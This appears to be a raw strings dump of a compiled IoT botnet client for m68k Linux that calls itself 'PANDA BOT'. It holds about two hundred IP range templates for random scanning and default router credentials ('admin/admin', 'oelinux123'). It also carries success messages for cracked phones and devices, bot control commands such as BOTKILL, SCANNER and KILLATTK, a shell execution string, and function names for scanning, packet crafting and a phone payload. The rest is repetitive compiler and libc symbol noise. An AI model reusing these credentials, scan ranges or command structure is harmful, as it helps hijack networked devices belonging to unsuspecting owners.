14.180.%d.%d
14.181.%d.%d
14.182.%d.%d
14.183.%d.%d
14.184.%d.%d
14.185.%d.%d
14.186.%d.%d
14.187.%d.%d
14.188.%d.%d
14.189.%d.%d
14.190.%d.%d
14.191.%d.%d
45.121.%d.%d
45.120.%d.%d
45.115.%d.%d
43.252.%d.%d
43.240.%d.%d
41.174.%d.%d
45.127.%d.%d
103.30.%d.%d
123.16.%d.%d
202.44.%d.%d
116.93.%d.%d
41.253.%d.%d
117.173.%d.%d
113.190.%d.%d
112.196.%d.%d
113.178.%d.%d
112.45.%d.%d
183.223.%d.%d
116.71.%d.%d
103.44.%d.%d
110.235.%d.%d
124.253.%d.%d
211.237.%d.%d
117.175.%d.%d
111.9.%d.%d
222.252.%d.%d
113.174.%d.%d
113.160.%d.%d
113.161.%d.%d
113.162.%d.%d
113.163.%d.%d
113.164.%d.%d
113.165.%d.%d
113.166.%d.%d
113.167.%d.%d
113.168.%d.%d
113.169.%d.%d
123.17.%d.%d
123.21.%d.%d
123.22.%d.%d
222.253.%d.%d
222.254.%d.%d
222.255.%d.%d
41.208.%d.%d
103.198.%d.%d
88.248.%d.%d
88.105.%d.%d
88.247.%d.%d
85.105.%d.%d
188.3.%d.%d
103.203.%d.%d
103.55.%d.%d
103.220.%d.%d
183.233.%d.%d
103.242.%d.%d
103.14.%d.%d
103.195.%d.%d
103.214.%d.%d
103.218.%d.%d
103.225.%d.%d
103.228.%d.%d
103.231.%d.%d
103.60.%d.%d
103.248.%d.%d
103.253.%d.%d
103.255.%d.%d
113.176.%d.%d
113.175.%d.%d
203.134.%d.%d
203.210.%d.%d
117.176.%d.%d
117.171.%d.%d
117.162.%d.%d
203.150.%d.%d
157.119.%d.%d
43.228.%d.%d
162.12.%d.%d
115.220.%d.%d
125.114.%d.%d
119.157.%d.%d
119.150.%d.%d
119.151.%d.%d
119.152.%d.%d
119.153.%d.%d
119.154.%d.%d
119.155.%d.%d
119.156.%d.%d
119.158.%d.%d
119.159.%d.%d
191.24.%d.%d
187.119.%d.%d
177.215.%d.%d
152.241.%d.%d
182.185.%d.%d
179.80.%d.%d
Eleele
179.81.%d.%d
179.82.%d.%d
179.83.%d.%d
179.84.%d.%d
179.86.%d.%d
179.87.%d.%d
179.88.%d.%d
179.89.%d.%d
179.90.%d.%d
179.91.%d.%d
179.92.%d.%d
179.93.%d.%d
179.94.%d.%d
179.95.%d.%d
179.96.%d.%d
179.97.%d.%d
179.98.%d.%d
179.99.%d.%d
152.240.%d.%d
152.242.%d.%d
152.243.%d.%d
152.244.%d.%d
152.245.%d.%d
152.246.%d.%d
152.247.%d.%d
152.248.%d.%d
152.249.%d.%d
182.189.%d.%d
182.190.%d.%d
182.191.%d.%d
182.188.%d.%d
182.187.%d.%d
182.186.%d.%d
182.184.%d.%d
179.100.%d.%d
179.101.%d.%d
179.102.%d.%d
179.103.%d.%d
179.110.%d.%d
179.111.%d.%d
179.112.%d.%d
179.113.%d.%d
179.114.%d.%d
179.115.%d.%d
179.116.%d.%d
179.117.%d.%d
191.193.%d.%d
191.194.%d.%d
191.195.%d.%d
191.196.%d.%d
191.197.%d.%d
191.198.%d.%d
152.250.%d.%d
152.251.%d.%d
152.252.%d.%d
152.253.%d.%d
152.254.%d.%d
152.255.%d.%d
177.112.%d.%d
177.113.%d.%d
177.114.%d.%d
177.115.%d.%d
177.116.%d.%d
177.117.%d.%d
177.118.%d.%d
177.119.%d.%d
177.120.%d.%d
177.121.%d.%d
177.138.%d.%d
177.139.%d.%d
177.144.%d.%d
177.145.%d.%d
177.146.%d.%d
177.147.%d.%d
177.160.%d.%d
177.161.%d.%d
177.162.%d.%d
177.163.%d.%d
177.168.%d.%d
177.169.%d.%d
177.170.%d.%d
177.171.%d.%d
177.172.%d.%d
189.96.%d.%d
189.97.%d.%d
189.98.%d.%d
189.99.%d.%d
39.34.%d.%d
59.103.%d.%d
191.12.%d.%d
186.117.%d.%d
179.131.%d.%d
179.129.%d.%d
179.170.%d.%d
191.206.%d.%d
187.118.%d.%d
187.116.%d.%d
179.224.%d.%d
179.166.%d.%d
admin
[31mPhone Cracked 
[32m-> 
[37m%s | 
[31mUsername 
[32m-> 
[37madmin | 
[31mPassword 
[32m-> 
[37madmin
oelinux123
[36mDevice Cracked 
[32m-> 
[37m%s | 
[36mUsername 
[32m-> 
[37m%s | 
[36mPassword 
[32m-> 
[37m%s
PONG!
GETLOCALIP
My IP: %s
BOTKILL
Killing Bots
PHONE
PHONE ON | OFF
PHONE SCANNER OFF:%s
SCANNER
SCANNER ON | OFF
 OFF
ICMP
RANGE
RANGE <option 0-idk>
Range %d->%d
KILLATTK
HOODASSSHIT18392839313129312392881929332R23937293173
8.8.8.8
/proc/net/route
	00000000	
/usr/bin/python
SERVER
ROUTER
sshd
/usr/sbin/dropbear
[35mPANDA BOT CONNECTED 
[36m-> 
[37m%s | 
[35mTYPE 
[36m-> 
[37m%s
PONG
MOVE
%s 2>&1
0.9.30
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
clntudp_create: out of memory
bad auth_len gid %d str %d auth %d
xdr_string: out of memory
xdr_bytes: out of memory
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
X__get_myaddress: socket
__get_myaddress: ioctl (get interface configuration)
__get_myaddress: ioctl
Cannot register service
xdr_array: out of memory
0123456789abcdef
/etc/hosts
/etc/config/hosts
%s%s%m
RPC: (unknown error code)
%s: 
; errno = %s
; low version = %lu, high version = %lu
; why = 
(unknown authentication error - %d)
; s1 = %lu, s2 = %lu
Authentication OK
Invalid client credential
Server rejected credential
Invalid client verifier
Server rejected verifier
Client credential too weak
Invalid server verifier
Failed (unspecified error)
RPC: Success
RPC: Can't encode arguments
RPC: Can't decode result
RPC: Unable to send
RPC: Unable to receive
RPC: Timed out
RPC: Incompatible versions of RPC
RPC: Authentication error
RPC: Program unavailable
RPC: Program/version mismatch
RPC: Procedure unavailable
RPC: Server can't decode arguments
RPC: Remote system error
RPC: Unknown host
RPC: Unknown protocol
RPC: Port mapper failure
RPC: Program not registered
RPC: Failed (unspecified error)
S[kA
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.data
.bss
.comment
libc/sysdeps/linux/m68k/crti.S
have_current_got
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2170
p.2168
__do_global_dtors_aux
call___do_global_dtors_aux
object.2251
frame_dummy
call_frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
call___do_global_ctors_aux
libc/sysdeps/linux/m68k/crtn.S
libc/sysdeps/linux/m68k/crt1.S
client.c
C.3.4122
C.0.4105
C.8.4167
C.12.4226
i.4279
printchar
prints
printi
print
fdopen_pids
hextable
get_random_ip
ipState
errno.c
thread_self
manager.c
thread_handle
invalid_handle
__pthread_init_lock
thread_segment
terminated_children
main_thread_exiting
pthread_kill_all_threads
pthread_allocate_stack
pthread_handle_create
pthread_threads_counter
pthread_start_thread_event
pthread_start_thread
suspend
pthread_free
pthread_handle_free
restart
pthread_handle_exit
pthread_exited
pthread_reap_children
ptfork.c
pthread_insert_list
pthread_call_handlers
pthread_atfork_lock
pthread_atfork_prepare
pthread_atfork_child
pthread_atfork_parent
semaphore.c
enqueue
dequeue
remove_from_queue
__pthread_set_own_extricate_if
new_sem_extricate_func
timedsuspend
signals.c
pthread_null_sighandler
pthread_sighandler
sighandler
pthread_sighandler_rt
spinlock.c
__pthread_release
__pthread_acquire
wait_node_free
wait_node_free_list_spinlock
wait_node_free_list
wait_node_alloc
wrapsyscall.c
pthread.c
current_rtmin
current_rtmax
pthread_handle_sigdebug
current_level
pthread_onexit_process
pthread_initialize
pthread_handle_sigrestart
pthread_handle_sigcancel
__libc_multiple_threads_ptr
attr.c
cancel.c
condvar.c
cond_extricate_func
pthread_cond_timedwait_relative
events.c
join.c
join_extricate_func
lockfile.c
mutex.c
__pthread_trylock
once_masterlock
once_finished
fork_generation
pthread_once_cancelhandler
__pthread_alt_trylock
ptlongjmp.c
pthread_cleanup_upto
specific.c
pthread_keys
pthread_keys_mutex
libc/sysdeps/linux/m68k/clone.S
__syscall_error_trampoline
thread_start
libc/sysdeps/linux/m68k/setjmp.S
__syscall_fcntl.c
__syscall_fcntl64.c
__syscall_fcntl64
_exit.c
__syscall_exit
access.c
chdir.c
__syscall_chdir
close.c
dup2.c
fork.c
fsync.c
getdtablesize.c
geteuid.c
getpagesize.c
getpid.c
getppid.c
getrlimit.c
gettimeofday.c
ioctl.c
kill.c
__syscall_kill
llseek.c
__syscall_llseek
longjmp.c
lseek.c
mmap.c
_mmap
msync.c
munmap.c
nanosleep.c
open.c
__syscall_open
open64.c
pause.c
pipe.c
poll.c
prctl.c
pread_write.c
__fake_pread_write64
__fake_pread_write
read.c
sched_get_priority_max.c
sched_get_priority_min.c
sched_getparam.c
__syscall_sched_getparam
sched_getscheduler.c
__syscall_sched_getscheduler
sched_setscheduler.c
__syscall_sched_setscheduler
sched_yield.c
select.c
setrlimit.c
setsid.c
sigprocmask.c
sigsuspend.c
__rt_sigsuspend
time.c
wait.c
wait4.c
__syscall_wait4
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
puts.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3828
_fixed_buffers
_wcommit.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
_do_one_spec
spec_base.4041
prefix.4042
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
_is_equal_or_bigger_arg
spec_flags.4040
qual_chars.4045
spec_chars.4041
spec_ranges.4042
spec_or_mask.4043
spec_and_mask.4044
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
_wordcopy_fwd_aligned
_wordcopy_fwd_dest_aligned
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1089
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
next_start.1067
isatty.c
tcdrain.c
tcgetattr.c
ntohl.c
herror.c
h_nerr
h_errlist
error_msg
colon_space.2720
inet_ntoa.c
buf.2603
inet_makeaddr.c
gethostbyname.c
buf.4831
h.4830
gethostbyname_r.c
accept.c
connect.c
getsockname.c
getsockopt.c
recv.c
recvfrom.c
recvmsg.c
send.c
sendmsg.c
sendto.c
setsockopt.c
socket.c
sigaction.c
sigaddset.c
sigdelset.c
sigempty.c
sigfillset.c
sigismem.c
sigjmp.c
signal.c
sigsetops.c
malloc.c
__malloc_from_heap
initial_fa
calloc.c
free.c
__heap_delete
__free_to_heap
heap_alloc.c
__heap_free_area_alloc
heap_free.c
__heap_link_free_area
__heap_link_free_area_after
__heap_add_free_area
rand.c
random.c
mylock
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
on_exit.c
execl.c
sleep.c
libc_pthread_init.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_suid
__check_one_fd
been_there_done_that.2790
rpc_thread.c
rpc_thread_multi
__libc_tsd_RPC_VARS_mem
once.5578
__syscall_error.c
libc/sysdeps/linux/m68k/__longjmp.S
libc/sysdeps/linux/m68k/vfork.S
fix_errno
__socketcall.c
__syscall_rt_sigaction.c
execve.c
getegid.c
getgid.c
getuid.c
sbrk.c
tolower.c
__C_ctype_tolower.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fprintf.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
vfprintf.c
memchr.c
memmove.c
_wordcopy_bwd_aligned
_wordcopy_bwd_dest_aligned
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
clnt_simple.c
clnt_udp.c
clntudp_geterr
clntudp_freeres
clntudp_abort
is_network_up
Beeb
udp_ops
clntudp_control
clntudp_destroy
clntudp_call
create_xid.c
is_initialized
__rpc_lrand48_data
pm_getport.c
timeout
tottimeout
pmap_prot.c
rpc_commondata.c
rpc_prot.c
accepted
rejected
reply_dscrm
svc.c
svc_find
svc_auth.c
svcauthsw
_svcauth_null
svc_authux.c
xdr.c
crud.3301
xdr_zero
xdr_mem.c
xdrmem_ops
xdrmem_destroy
xdrmem_getpos
xdrmem_setpos
xdrmem_inline
xdrmem_putint32
xdrmem_putlong
xdrmem_getint32
xdrmem_getlong
xdrmem_putbytes
xdrmem_getbytes
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
realloc.c
heap_alloc_at.c
abort.c
been_there_done_that
lrand48_r.c
nrand48_r.c
srand48_r.c
__exit_handler.c
dl-support.c
brk.c
cmsg_nxthdr.c
fclose.c
fopen.c
fseeko.c
printf.c
fseeko64.c
_adjust_pos.c
_fopen.c
_cs_funcs.c
fgets.c
fputs.c
fflush_unlocked.c
fgets_unlocked.c
memcmp.c
memcmp_common_alignment
memcmp_not_common_alignment
rawmemchr.c
strncat.c
strspn.c
ffs.c
strdup.c
auth_none.c
authnone_verf
authnone_validate
authnone_refresh
authnone_destroy
authnone_marshal
authunix_prot.c
bindresvport.c
port.2275
pmap_clnt.c
__get_myaddress
rpc_dtablesize.c
size.3840
xdr_array.c
ntop.c
inet_pton4
inet_pton6
xdigits.3095
inet_ntop4
inet_ntop6
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
bind.c
drand48-iter.c
perror.c
fgetc_unlocked.c
strcasecmp.c
clnt_perror.c
rpc_errlist
rpc_errstr
auth_errmsg
auth_errlist
auth_errstr
free_mem
_buf
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
longjmp
__libc_tcdrain
__linuxthreads_pthread_threads_max
__GI_pthread_attr_getdetachstate
__GI_execve
__libc_sigaction
__libc_pread
strcpy
__GI_fcntl64
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
xdr_longlong_t
bcmp
__GI_memchr
userID
__GI_pthread_attr_setdetachstate
__GI___glibc_strerror_r
pthread_mutex_timedlock
waitpid
__longjmp
__libc_fsync
__open_nameservers
__GI_fopen
xprt_register
getrlimit
pause
ioctl
pthread_cond_signal
_stdio_openlist_use_count
__pthread_mutexattr_destroy
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_xdrmem_create
__GI_time
getgid
__pthread_exit_code
printf
stdout
random
__GI_strdup
__GI_getpagesize
lrand48_r
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__pthread_restart_new
__GI_tolower
pthread_mutexattr_gettype
putc_unlocked
pthread_attr_destroy
recv
connect
__linuxthreads_initial_report_events
__encode_question
svcerr_auth
__GI___uClibc_fini
D3cOdeMePlS
numpids
__encode_header
pthread_attr_getstacksize
__GI_strncat
__pthread_once
pthread_create
sigemptyset
__pthread_mutex_lock
pthread_getspecific
__new_sem_destroy
initConnection
__sigdelset
__GI_pthread_attr_init
__GI_svc_register
__pthread_find_self
__uClibc_fini
memrchr
geteuid
__rpc_thread_svc_cleanup
inet_pton
__GI_vsnprintf
pthread_attr_init
__GI_pthread_setcanceltype
__GI_setsid
pthread_mutexattr_getkind_np
Phonepid
__GI_sigsuspend
memmove
pthread_exit
__bsd_signal
sem_timedwait
__GI_strpbrk
pmap_set
__stdio_trans2r_o
__GI_setsockopt
munmap
__libc_stack_end
__pthread_manager_thread_bos
sched_getparam
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
_longjmp
__exit_function_table
__GI_xdr_pmap
pthread_condattr_setpshared
xdrmem_create
__libc_fcntl
atol
_h_errno
xdr_des_block
__new_sem_init
xdr_opaque_auth
getc_unlocked
clnt_spcreateerror
__ctype_b
__pthread_manager_event
__GI_random_r
__fresetlockfiles
usernames
clnt_perrno
sendUKNOWN
pwrite64
__GI___longjmp
__pthread_mutexattr_settype
errno
getegid
__GI_pthread_attr_getschedparam
read_until_response
__linuxthreads_create_event
__GI_clnt_sperror
__GI_sbrk
zprintf
__libc_accept
__GI___uClibc_init
__heap_alloc_at
_create_xid
__exit_handler
execve
__libc_current_sigrtmax
__GI_pthread_condattr_destroy
__libc_pwrite64
pthread_condattr_init
getpagesize
getpid
pthread_attr_getstackaddr
xdr_u_hyper
__pthread_suspend
setstate_r
__GI_lseek64
fgets
getHost
__libc_getpid
HackerScan1
wildString
pthread_key_delete
__GI_pthread_attr_setschedparam
__xpg_strerror_r
__GI___rpc_thread_svc_fdset
__heap_free
_pthread_cleanup_pop
fcntl64
prctl
__pthread_lock
memcpy
__GI_svc_getreq
pthread_cancel
makeRandomStr
pmap_getport
__GI_fputs_unlocked
execl
__pthread_mutexattr_setpshared
__GI_fgets
__pthread_initial_thread_bos
svc_sendreply
perror
pthread_mutexattr_destroy
_rpc_dtablesize
__pthread_reset_main_thread
creat
_stdio_openlist_dec_use
sclose
__libc_select
__pthread_do_exit
pthread_equal
_ppfs_init
__GI_memcmp
puts
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
__libc_current_sigrtmin
__pthread_sig_debug
sem_destroy
__GI__seterr_reply
tolower
getuid
__GI_xdr_string
system
__open_etc_hosts
__rpc_thread_svc_max_pollfd
__GI_xprt_register
__pthread_cleanup_push_defer
malloc
isatty
__GI_pthread_cond_timedwait
siglongjmp
pthread_attr_getscope
__GI_pmap_unset
sleep
__GI_atol
sched_setscheduler
__new_sem_post
__pthread_initialize_manager
vsnprintf
__dns_lookup
__GI_read
recvfrom
sem_wait
xdr_bytes
svcerr_decode
tcdrain
__C_ctype_tolower
pthread_attr_getguardsize
phonepayload
random_r
__libc_longjmp
__dso_handle
sem_post
sched_getscheduler
__new_exitfn
pthread_testcancel
__malloc_heap_lock
__pthread_manager_sighandler
__libc_pthread_init
gethostbyname_r
__pthread_attr_getstackaddr
tcpcsum
__linuxthreads_death_event
__linuxthreads_version
fdpclose
__GI_pthread_attr_destroy
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
D1ckSuckaz
__GI_memset
__GI_accept
clnt_perror
__pthread_attr_setstacksize
isspace
pthread_attr_getinheritsched
__stdio_seek
__linuxthreads_pthread_keys_max
pthread_kill_other_threads_np
mempcpy
__GI_strcoll
__GI_write
__pthread_mutexattr_gettype
xdr_void
sem_unlink
A Santa lives evil at NASA
__ctype_toupper
__libc_pwrite
__libc_read
xdr_pmap
svcerr_progvers
__GI_xdr_accepted_reply
_string_syserrmsgs
svcerr_noproc
__GI_herror
__pthread_kill_other_threads_np
__GI_open
__GI_strchr
__searchdomain
__pthread_initialize
__GI_xdr_rejected_reply
__pthread_mutexattr_setkind_np
lseek
__GI_clnt_perror
__malloc_heap
sigaddset
__linuxthreads_pthread_key_2ndlevel_size
__GI_tcgetattr
__environ
mmap
xdr_vector
__GI_clntudp_create
__pthread_alt_unlock
svc_getreq_common
wcsnrtombs
pthread_detach
makeIPPacket
__GI_inet_ntoa
send
svc_getreq
__fgetc_unlocked
__GI_clnt_spcreateerror
abort
nrand48_r
xprt_unregister
pthread_attr_getschedpolicy
__sigjmp_save
__libc_drand48_data
__pthread_handles
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
